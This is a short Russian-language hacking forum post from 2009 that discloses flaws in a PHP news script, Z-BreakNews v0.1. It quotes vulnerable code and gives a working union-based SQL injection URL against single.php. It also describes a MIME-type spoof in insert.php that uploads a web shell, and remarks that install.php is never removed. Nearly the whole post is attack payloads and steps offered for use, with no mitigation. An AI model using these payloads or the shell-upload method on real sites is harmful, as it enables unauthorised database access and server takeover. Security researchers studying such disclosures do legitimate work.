14.11.2009, 04:52
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Z-BreakNews v0.1
Далее судьба автора неизвестна.
Думал нигде не встречу этой лабуды,но раз встретилось,напишу.
file: single.php
PHP код:
...
$row=mysql_fetch_array(mysql_query("SELECT * FROM news WHERE id=".$_GET['id']));
...
target: single.php?id=1+union+select+1,2,3,4+--+4
file:insert.php
PHP код:
...
if (($img1_type == $cert1) or ($img1_type == $cert2) or ($img1_type == $cert3))
...
target: Меняем mime-type в заголовках,заливаем шелл.
В довесок скажу, что никто не просит удалять install.php.
Последний раз редактировалось m0Hze; 14.11.2009 в 05:17..
|
|
|